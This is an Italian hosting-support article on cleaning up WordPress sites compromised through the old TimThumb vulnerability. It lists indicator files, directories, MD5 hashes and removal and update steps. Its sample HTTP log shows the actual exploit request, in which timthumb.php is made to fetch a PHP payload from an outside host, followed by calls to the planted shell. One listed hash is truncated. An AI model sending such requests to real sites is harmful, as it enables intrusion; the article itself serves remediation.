Compromissioni WordPress TimThumb

TimThumb è uno strumento utilizzato da temi e plug-in WordPress per il ridimensionamento di immagini. Le versioni precedenti di TimThumb presentano una vulnerabilità della sicurezza che consente agli autori di attacchi di caricare file fraudolenti ("dannosi") da altri siti web. Il primo file dannoso consente quindi all'autore dell’attacco di caricare altri file fraudolenti sull'account hosting.

Maggiori informazioni sui casi di compromissione e su come affrontarli sono disponibili su Che cosa succede se il mio sito è oggetto di attacco?.

Segnali di compromissione

Oltre ai segnali menzionati in Che cosa succede se il mio sito è oggetto di attacco?, è possibile stabilire se il sito è stato interessato da una compromissione di questo tipo se l’account contiene i seguenti file in una directory di plug-in:

  • external_[md5 hash].php — ad esempio: external_dc8e1cb5bf0392f054e59734fa15469b.php
  • [md5 hash].php — ad esempio: 7eebe45bde5168488ac4010f0d65cea8.php

Alcuni esempi di possibili hash md5 sono riportati nella sezione MD5 Riepilogo di alcuni file fraudolenti noti del presente articolo.

È inoltre possibile trovare i seguenti file nella directory principale del proprio sito Web (maggiori informazioni):

  • x.txt
  • logx.txt

Soluzioni

È necessario rimuovere tutti i file compromessi e dannosi. Prima di eliminare qualsiasi elemento, ti consigliamo di fare un backup del sito web (maggiori informazioni).

Individuazione dei file dannosi

I file dannosi inizialmente caricati attraverso la vulnerabilità TimThumb si trovano in genere in una delle seguenti directory, contenute a loro volta nella directory /theme o /plug-in che contiene il file TimThumb vulnerabile.

  • /tmp
  • /cache
  • /images

Esempi di ubicazione dei file dannosi:

[webroot]/wp-content/themes/[tema con TimThumb vulnerabile]/cache/images/

Esempi di nomi di file dannosi in tali posizioni:

  • ef881b33fba49bd6ad1818062d071a9c.php
  • db648d44074f33a8857066b97290d247.php
  • 3cf739debc9340540c923bbf3b73044b.php
  • dc33a2e36d3179a06278191088c2ef35.php
  • 8377cb73d30655dc2cbf906c9310da56.php
  • eb117b212e2906f52c0a0c9132c6c07a.php
  • a4924ec23939d2410354efbb8d4ddd06.php
  • vvv3.php
  • ea90e1e4d7ba30848f70b13d616c6ed4.php
  • 236268f2a06e4153365b998d13934eb9.php
  • 6a4fa516943e2fa09e3704486075de9f.php
  • 896c4eb4ff2581f6e623db1904b80a44.php
  • wp-images.php

I file x.txt e logx.txt conterranno informazioni su quando è stato creato un file dannoso utilizzando la vulnerabilità TimThumb e la posizione del file non valido nell'account hosting. Queste informazioni sono utili per determinare quali file devono essere rimossi e dove trovarli. Tuttavia, è improbabile che forniscano un elenco completo dei file che devono essere rimossi.

Ad esempio:

Day : Thu, 11 Apr 2013 06:21:15 -0700
IP: X.X.X.X
Browser: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Url: /wp-content/themes/[theme with vulnerable TimThumb]/cache/images/2817f389ac8b52527a0c5e4aabb464aa.php?clone

File da rimuovere

Una volta creata una versione di backup del sito, rimuovi i file seguenti:

  • x.txt
  • logx.txt
  • external_[md5 hash].php — ad esempio: external_dc8e1cb5bf0392f054e59734fa15469b.php
  • [md5 hash].php — ad esempio: 7eebe45bde5168488ac4010f0d65cea8.php
  • Altri file PHP dannosi trovati assieme ai file con nome hash md5.

È possibile farlo tramite FTP (maggiori informazioni) o tramite il file manager all'interno del pannello di controllo del proprio account hosting (maggiori informazioni).

Dovrai inoltre:

  • Aggiornare tutti i temi e i plug-in alla versione più recente.
  • Sostituire ogni istanza di TimThumb.php con la versione più recente disponibile qui.

Informazioni tecniche

Esempio di log HTTP

x.x.x.x - - [27/Apr/2014:08:04:22 -0700] "GET SampleSite.tld/wp-content/themes/[tema con TimThumb vulnerabile]/framework/timthumb.php?src=http%3A%2F%2Fimg.youtube.com.bargainbookfinders.com%2Fsempak.php HTTP/1.1" 200 1018 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.s - - [27/Apr/2014:08:04:23 -0700] "GET SampleSite.tld/wp-content/themes/[tema con TimThumb vulnerabile]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php?clone HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:26 -0700] "GET SampleSite.tld/wp-includes/wp-script.php HTTP/1.1" 404 36841 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:28 -0700] "GET SampleSite.tld/wp-content/themes/[tema con TimThumb vulnerabile]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:30 -0700] "GET SampleSite.tld/wp-content/themes/[tema con TimThumb vulnerabile]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"

MD5 Riepilogo di alcuni file dannosi noti

  • 2c4bcdc6bee98ed4dd55e0d35564d870
  • 10069c51da0c87ad904d602beb9e7770
  • 8855aecb5c45a5bfd962b4086c8ff96a
  • 526a4cf1f66f27a959a39019fdf1fae9
  • 161d2e53c664bd0fe1303017a145b413
  • 39f186a0f55b04c651cbff6756a64ccc
  • f67ca8f0bac08f5e8ccab6013b7acf70
  • 747c7afcda0eef0eff6ed6838494c32
  • cfdf59a58057b62f4707b909bcbd4577

Ulteriori file fraudolenti

  • wp-script.php
  • wp-images.php
  • vvv3.php
  • data.php

Questo articolo è stato di aiuto?
Grazie per il tuo feedback. Per parlare con un addetto dell’assistenza clienti, usa il numero di telefono o l’opzione chat qui sopra.
Felici di esserti stati di aiuto! C'è altro che possiamo fare per te?
Ci dispiace. Dicci che cosa hai trovato di poco chiaro o perché la soluzione non ha risolto il problema.